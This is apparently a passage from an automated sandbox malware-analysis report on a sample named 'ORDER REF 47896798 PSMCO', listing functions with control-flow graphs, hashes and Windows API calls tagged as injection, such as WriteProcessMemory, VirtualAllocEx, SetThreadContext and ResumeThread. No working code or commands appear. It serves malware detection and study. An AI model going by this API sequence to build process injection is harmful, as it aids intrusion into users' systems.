                                                                                            control_flow_graph 453 7ef0b7c-7ef21a4 455 7ef21af-7ef21be 453->455 456 7ef21a6-7ef21ac 453->456 457 7ef21c3-7ef21fc DrawTextExW 455->457 458 7ef21c0 455->458 456->455 459 7ef21fe-7ef2204 457->459 460 7ef2205-7ef2222 457->460 458->457 459->460
                                                                                            APIs
                                                                                            • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,07EF213D,?,?), ref: 07EF21EF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2128007437.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ef0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID: DrawText
                                                                                            • String ID:
                                                                                            • API String ID: 2175133113-0
                                                                                            • Opcode ID: caadca1f8ff1b2e01186194dedb8c9813dbbb0b3dbe2640fb425847a60f132e0
                                                                                            • Instruction ID: 7f04ba5a66dceb68ff05331d640744da988ef9f46ea496cae20c44674f6a0521
                                                                                            • Opcode Fuzzy Hash: caadca1f8ff1b2e01186194dedb8c9813dbbb0b3dbe2640fb425847a60f132e0
                                                                                            • Instruction Fuzzy Hash: 0C31E5B59017099FDB10CF9AD884ADEFBF8FB48310F14842AEA19A7310D774A944CFA4
                                                                                            Function 07EF2150 Relevance: 1.6, APIs: 1, Instructions: 70COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 463 7ef2150-7ef21a4 465 7ef21af-7ef21be 463->465 466 7ef21a6-7ef21ac 463->466 467 7ef21c3-7ef21fc DrawTextExW 465->467 468 7ef21c0 465->468 466->465 469 7ef21fe-7ef2204 467->469 470 7ef2205-7ef2222 467->470 468->467 469->470
                                                                                            APIs
                                                                                            • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,07EF213D,?,?), ref: 07EF21EF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2128007437.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ef0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID: DrawText
                                                                                            • String ID:
                                                                                            • API String ID: 2175133113-0
                                                                                            • Opcode ID: 31205d2c0a08e73bc6c0047b6755e92a353138d9ac853b4b5979eceb2ddc3463
                                                                                            • Instruction ID: 332ca1d7319d78ec211979901c4b9cf6a6614438f50171fe9de7eec0be21f0d4
                                                                                            • Opcode Fuzzy Hash: 31205d2c0a08e73bc6c0047b6755e92a353138d9ac853b4b5979eceb2ddc3463
                                                                                            • Instruction Fuzzy Hash: 5631E0B590124A9FDB00CF99D884ADEBBF4BF48320F14842AEA18A7610D374A544CFA4
                                                                                            Function 078371B8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 473 78371b8-7837206 475 7837216-7837255 WriteProcessMemory 473->475 476 7837208-7837214 473->476 478 7837257-783725d 475->478 479 783725e-783728e 475->479 476->475 478->479
                                                                                            APIs
                                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07837248
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2127863739.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7830000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID: MemoryProcessWrite
                                                                                            • String ID:
                                                                                            • API String ID: 3559483778-0
                                                                                            • Opcode ID: 815d3a1bc52f5032771b9e4d934e500828fd1a54e2ac7d8fd136d1708d72b26f
                                                                                            • Instruction ID: b2368ab7f895fa137e1876a27534278176467396e30632514de3e92d61a7aced
                                                                                            • Opcode Fuzzy Hash: 815d3a1bc52f5032771b9e4d934e500828fd1a54e2ac7d8fd136d1708d72b26f
                                                                                            • Instruction Fuzzy Hash: 442127B19003499FDF10CFA9C885BDEBBF5FF48320F108829E919A7240D7789954CBA4
                                                                                            Function 078371B1 Relevance: 1.6, APIs: 1, Instructions: 68injectionCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 483 78371b1-7837206 485 7837216-7837255 WriteProcessMemory 483->485 486 7837208-7837214 483->486 488 7837257-783725d 485->488 489 783725e-783728e 485->489 486->485 488->489
                                                                                            APIs
                                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07837248
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2127863739.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7830000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID: MemoryProcessWrite
                                                                                            • String ID:
                                                                                            • API String ID: 3559483778-0
                                                                                            • Opcode ID: e6ba333a329d10ced576c1191e0914a3eb3bbee601d3b97018ef51adc3e26fec
                                                                                            • Instruction ID: 5316f746f406115a3e36c1605adc94c0bf95a175d951e00bd158dff7fffef252
                                                                                            • Opcode Fuzzy Hash: e6ba333a329d10ced576c1191e0914a3eb3bbee601d3b97018ef51adc3e26fec
                                                                                            • Instruction Fuzzy Hash: 5D2128B59003499FDF10CFA9C985BDEBBF1FF48310F10882AE919A7240D7789554CBA4
                                                                                            Function 0173D960 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 493 173d960-173d9fc DuplicateHandle 494 173da05-173da22 493->494 495 173d9fe-173da04 493->495 495->494
                                                                                            APIs
                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0173D9EF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2118492129.0000000001730000.00000040.00000800.00020000.00000000.sdmp, Offset: 01730000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_1730000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID: DuplicateHandle
                                                                                            • String ID:
                                                                                            • API String ID: 3793708945-0
                                                                                            • Opcode ID: 68edf76017b24d920c6530a5a2405d220cc24120d159e12351b23ba7936801d7
                                                                                            • Instruction ID: 1d43675d9a146a11725f2926b34c5a4050476c4d6d88c879a30290fe40208703
                                                                                            • Opcode Fuzzy Hash: 68edf76017b24d920c6530a5a2405d220cc24120d159e12351b23ba7936801d7
                                                                                            • Instruction Fuzzy Hash: 9521E3B5D002499FDB10CFA9D985ADEBBF8FB48320F14841AE918A3310D378A954CFA1
                                                                                            Function 078372A8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07837328
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2127863739.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7830000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID: MemoryProcessRead
                                                                                            • String ID:
                                                                                            • API String ID: 1726664587-0
                                                                                            • Opcode ID: 84ece72126c403928732920b96d3758b235c1cdee5037b06aa9921ffbdefcf81
                                                                                            • Instruction ID: 82c6465d9011f6da17e99479b63770a4a89db610892cf653754ac1434be7de5e
                                                                                            • Opcode Fuzzy Hash: 84ece72126c403928732920b96d3758b235c1cdee5037b06aa9921ffbdefcf81
                                                                                            • Instruction Fuzzy Hash: 952128B18003499FDF10CFAAC881BDEBBF5FF48310F508429E918A7240D7789510CBA5
                                                                                            Function 07837018 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0783709E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2127863739.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7830000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID: ContextThreadWow64
                                                                                            • String ID:
                                                                                            • API String ID: 983334009-0
                                                                                            • Opcode ID: 7789c6330c4bb5a2b49d63737166a286eaf0d31199517d581bab9dd0e2c81aff
                                                                                            • Instruction ID: 7a846c551479625de6557b86f7e6e2f8038eac5be228ac5f76f89df13b61a6fb
                                                                                            • Opcode Fuzzy Hash: 7789c6330c4bb5a2b49d63737166a286eaf0d31199517d581bab9dd0e2c81aff
                                                                                            • Instruction Fuzzy Hash: D52138B19003098FDB50DFA9C5857EEBBF4AF48324F14842AD559A7240DB789944CFA5
                                                                                            Function 07837020 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0783709E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2127863739.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7830000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID: ContextThreadWow64
                                                                                            • String ID:
                                                                                            • API String ID: 983334009-0
                                                                                            • Opcode ID: 3a66c4217059480eb17ffa536f211e190d05888879bcfb8d31c2824e4d3cc765
                                                                                            • Instruction ID: 37de2f73f64b57e03477da9c0fce6b2afb04fc1ef5cd4dae99687148da6bd22c
                                                                                            • Opcode Fuzzy Hash: 3a66c4217059480eb17ffa536f211e190d05888879bcfb8d31c2824e4d3cc765
                                                                                            • Instruction Fuzzy Hash: 952129B19003099FDB10DFAAC8857EEBBF4EF88324F148429D519A7240DB789944CFA5
                                                                                            Function 0173D968 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0173D9EF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2118492129.0000000001730000.00000040.00000800.00020000.00000000.sdmp, Offset: 01730000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_1730000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID: DuplicateHandle
                                                                                            • String ID:
                                                                                            • API String ID: 3793708945-0
                                                                                            • Opcode ID: ddeac8625bc1782d255667b32b8a75e43b4f259adac13d2a539e4513772d4e45
                                                                                            • Instruction ID: c6b8bb0c299624894947474c80621ed91b4d9fa18fd5bc04c0495887a743bb6d
                                                                                            • Opcode Fuzzy Hash: ddeac8625bc1782d255667b32b8a75e43b4f259adac13d2a539e4513772d4e45
                                                                                            • Instruction Fuzzy Hash: 9721C4B59002499FDB10CFAAD984ADEFFF9FB48320F14841AE914A3350D374A954CFA5
                                                                                            Function 078372A1 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07837328
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2127863739.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7830000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID: MemoryProcessRead
                                                                                            • String ID:
                                                                                            • API String ID: 1726664587-0
                                                                                            • Opcode ID: 485af6a9445375f334cb1bae96212fda6289247d956eb7cb39b14ec211e8eb38
                                                                                            • Instruction ID: a254d0b6eae97ea0c032afa6f5dfc9acd1aa713941b55714fcd1954cc9669661
                                                                                            • Opcode Fuzzy Hash: 485af6a9445375f334cb1bae96212fda6289247d956eb7cb39b14ec211e8eb38
                                                                                            • Instruction Fuzzy Hash: DF2116B18003499FDF10CFA9C9857EEBBF5FF48310F50882AE918A7240D7789510CBA5
                                                                                            Function 07EF0C2C Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,07EF372A,?,?,?,?,?), ref: 07EF37CF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2128007437.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ef0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateFromIconResource
                                                                                            • String ID:
                                                                                            • API String ID: 3668623891-0
                                                                                            • Opcode ID: 1763c6eb24bb2c36e576d194a0d35a62b6d158ddf9bc09a791980c0bff7417a0
                                                                                            • Instruction ID: fec3436a9523892644687f85fe2bd320266b6c801554ff92ac728fa1bb0e20d6
                                                                                            • Opcode Fuzzy Hash: 1763c6eb24bb2c36e576d194a0d35a62b6d158ddf9bc09a791980c0bff7417a0
                                                                                            • Instruction Fuzzy Hash: 031126B590024DDFDB10CF9AC884BDEBFF8EB48320F14845AEA14A7250D379A950CFA4
                                                                                            Function 078370F8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07837166
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2127863739.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7830000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 4275171209-0
                                                                                            • Opcode ID: 3941077be017ab45223a4025e6c18c748f0a86c81bc34e3656c93fd8ea8c0893
                                                                                            • Instruction ID: a178fcde06708975659ff8ab328692ed318bb82932c9a87943b1a288d8dab269
                                                                                            • Opcode Fuzzy Hash: 3941077be017ab45223a4025e6c18c748f0a86c81bc34e3656c93fd8ea8c0893
                                                                                            • Instruction Fuzzy Hash: 241156B28002499FDF10DFAAC844BDFBBF5AF88320F148819E519A7250C775A510CBA0
                                                                                            Function 078370F0 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07837166
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2127863739.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7830000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 4275171209-0
                                                                                            • Opcode ID: 6ab0756b8557eed16b7dff90e64d6e9eff867582ea1206b0870261c05a01e412
                                                                                            • Instruction ID: 16f3acbdeecf6bb610abf71b9214acccd0f9e3d98536e54dd94bd146aa1258d7
                                                                                            • Opcode Fuzzy Hash: 6ab0756b8557eed16b7dff90e64d6e9eff867582ea1206b0870261c05a01e412
                                                                                            • Instruction Fuzzy Hash: F81167B290034A8FDF10DFA9C8457DFBBF5AF88320F14881AD619A7250C7799554CF94
                                                                                            Function 07836B38 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2127863739.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7830000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID: ResumeThread
                                                                                            • String ID:
                                                                                            • API String ID: 947044025-0
                                                                                            • Opcode ID: e578408fbea3ed63ef87a01a1bd121226ccf57f71d3848cc11669fdeb3efca13
                                                                                            • Instruction ID: badc3a7b91078a82643d28375dc62f4c1178599c841070fb76150c1c64b75150
                                                                                            • Opcode Fuzzy Hash: e578408fbea3ed63ef87a01a1bd121226ccf57f71d3848cc11669fdeb3efca13
                                                                                            • Instruction Fuzzy Hash: 391166B19003498FDB20DFAAC4457EEFBF4AF88320F248819D519A7240DB79A900CFA4
                                                                                            Function 07836B31 Relevance: 1.5, APIs: 1, Instructions: 48threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2127863739.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7830000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID: ResumeThread
                                                                                            • String ID:
                                                                                            • API String ID: 947044025-0
                                                                                            • Opcode ID: bd61aa3d2976c08154ea6347fc2322a406b75cec6f45fe260fb6c59706ef6da4
                                                                                            • Instruction ID: f7d85c9a88fe38eb634b3325c1f39dcf5ecf6eee862c7067fd8b96b19f480c11
                                                                                            • Opcode Fuzzy Hash: bd61aa3d2976c08154ea6347fc2322a406b75cec6f45fe260fb6c59706ef6da4
                                                                                            • Instruction Fuzzy Hash: 7A1128B19003498FDB10DFA9C5457EEFBF5BF88324F24881AD519A7240DB79A544CF94
                                                                                            Function 0173B560 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0173B5C6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2118492129.0000000001730000.00000040.00000800.00020000.00000000.sdmp, Offset: 01730000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_1730000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID: HandleModule
                                                                                            • String ID:
                                                                                            • API String ID: 4139908857-0
                                                                                            • Opcode ID: 270f6283a79209d7b04283922888ae05add1dddb153339c897d268a9f95d13c3
                                                                                            • Instruction ID: e27fd974eb658945804facb5fc808a515689684bb13bfb2c622af21e27ca4faf
                                                                                            • Opcode Fuzzy Hash: 270f6283a79209d7b04283922888ae05add1dddb153339c897d268a9f95d13c3
                                                                                            • Instruction Fuzzy Hash: 31110FB6C002498FDB10CF9AC444ADEFBF4AF88320F20842AD528B7250D379A545CFA1
                                                                                            Function 07839D68 Relevance: 1.5, APIs: 1, Instructions: 43windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 07839DCD
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2127863739.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7830000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessagePost
                                                                                            • String ID:
                                                                                            • API String ID: 410705778-0
                                                                                            • Opcode ID: d3bc7bf3f416a86efb63a1af2e6eab8a9996beafc0e34c901404a037a6297154
                                                                                            • Instruction ID: 22e6e6d97552d78bb69dfa59fac1e66dea240324cac6786b83a7680db60467fa
                                                                                            • Opcode Fuzzy Hash: d3bc7bf3f416a86efb63a1af2e6eab8a9996beafc0e34c901404a037a6297154
                                                                                            • Instruction Fuzzy Hash: F711C2B58003499FDB10CF99D589BDEBBF4FB58324F20981AD528A7210D3B5A554CFA1
                                                                                            Function 07839DA1 Relevance: 1.5, APIs: 1, Instructions: 30windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 07839DCD
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2127863739.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7830000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessagePost
                                                                                            • String ID:
                                                                                            • API String ID: 410705778-0
                                                                                            • Opcode ID: da8735d86a15553b3fd5961cacab385428e26a5b512280d2d6389df7f3e65b32
                                                                                            • Instruction ID: c2cbe2fae1ff969345e9953e5955eb56400215340f6981c73cd13968114c18b3
                                                                                            • Opcode Fuzzy Hash: da8735d86a15553b3fd5961cacab385428e26a5b512280d2d6389df7f3e65b32
                                                                                            • Instruction Fuzzy Hash: C0F0E7B68003099FDB10CF89D449BDEFBF4FB58324F10841AE558A7210C3B9A554CFA1
                                                                                            Function 012CD4C4 Relevance: .1, Instructions: 75COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2114498793.00000000012CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012CD000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_12cd000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e8f14127f743ff69ef88f3e89e70255b280282b51117a0246518153118aff115
                                                                                            • Instruction ID: 81b3dbd86507726edde344276ff16536a0cc3ed7547a225a16a4e16d2a7c4393
                                                                                            • Opcode Fuzzy Hash: e8f14127f743ff69ef88f3e89e70255b280282b51117a0246518153118aff115
                                                                                            • Instruction Fuzzy Hash: 1B212172520248EFDB15DF54E9C0B26BF61FB98B18F20827DEA090A256C376D416CAE1
                                                                                            Function 012DD01C Relevance: .1, Instructions: 72COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2114537790.00000000012DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DD000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_12dd000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 89e49540526be0c9a11e1b13e7f5664e9a0bf1592f92296872bd365e1b7eede4
                                                                                            • Instruction ID: 4efa8c53f7c1c01c6bdb6c8feb4ca1a6714e9febc6596e15b048969103129c71
                                                                                            • Opcode Fuzzy Hash: 89e49540526be0c9a11e1b13e7f5664e9a0bf1592f92296872bd365e1b7eede4
                                                                                            • Instruction Fuzzy Hash: 3E214275214608EFCB14DF68D9C0B26BB61FBC8315F20C56DDA0A0B292C37AD407CA61
                                                                                            Function 012DD1D4 Relevance: .1, Instructions: 72COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2114537790.00000000012DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DD000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_12dd000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 79806e863b059e4f5aae9f79d4133b6d1f286a5e77fec7eb1c14bf0088b1e855
                                                                                            • Instruction ID: 00c297ba66802d88c8115bc491635eeb0d0a3b4a069f6e654cf76dec45ea9357
                                                                                            • Opcode Fuzzy Hash: 79806e863b059e4f5aae9f79d4133b6d1f286a5e77fec7eb1c14bf0088b1e855
                                                                                            • Instruction Fuzzy Hash: 0E214675524708EFDB05DFA4D9C4F26BBA5FB84324F20C56DEA094B293C376D806CA61
                                                                                            Function 012DD006 Relevance: .1, Instructions: 60COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2114537790.00000000012DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DD000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_12dd000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: fff15b47424c7790e54473be0e842fd21ea3ec8085b141671633a4e56a3e9f6e
                                                                                            • Instruction ID: 677a93855e505d7b7905d1287528b6e7e1031bcf26bca58384e4d3089e208f5d
                                                                                            • Opcode Fuzzy Hash: fff15b47424c7790e54473be0e842fd21ea3ec8085b141671633a4e56a3e9f6e
                                                                                            • Instruction Fuzzy Hash: 1321C3755097848FCB13CF24D990715BF71EB85314F28C5EAD9498B6A7C33AD40ACB62
                                                                                            Function 012CD4BF Relevance: .1, Instructions: 56COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2114498793.00000000012CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012CD000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_12cd000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                                                            • Instruction ID: db92ed85c5a95e3c33cf4f705c8f14a327ac0ea997c1df36269e4762b817c9cb
                                                                                            • Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                                                            • Instruction Fuzzy Hash: BD11DF76404284CFCB12CF54E9C0B16BF71FB94718F24C6ADDA090B256C33AD45ACBA1
                                                                                            Function 012DD1CF Relevance: .1, Instructions: 53COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2114537790.00000000012DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DD000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_12dd000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                                                            • Instruction ID: 0815ad96faeb4236c8af7f6ef9d256f8aaebeced119451a4a918a1dcb8fc6156
                                                                                            • Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                                                            • Instruction Fuzzy Hash: 5011BB75504684DFDB02CF54C5C4B15BBB1FB84224F24C6A9D9494B6A7C33AD40ACB61

                                                                                            Non-executed Functions

                                                                                            Function 078343F8 Relevance: .3, Instructions: 312COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2127863739.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7830000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 63dd177feb911ce35bb8c73eb81be745d26621b9f6491404e9ed3762828c4161
                                                                                            • Instruction ID: 6b2a5a63d0adbb9adf68d3fbde726325d3687defa2bdd3bf9403a2a70188f846
                                                                                            • Opcode Fuzzy Hash: 63dd177feb911ce35bb8c73eb81be745d26621b9f6491404e9ed3762828c4161
                                                                                            • Instruction Fuzzy Hash: A9E10EB4E101598FDB14CFA9C580AAEFBB2FF89304F248169D818A7356D7749D42CFA1
                                                                                            Function 07836310 Relevance: .3, Instructions: 312COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2127863739.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7830000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 08f5274a7fd135b5dda05748d2ef0bce9616a5ff7497143267ca8ff07fc3b88f
                                                                                            • Instruction ID: 95851bbc07f7e43eb940f3916aa0a38221184a44d963c0c2233500a40dcaca36
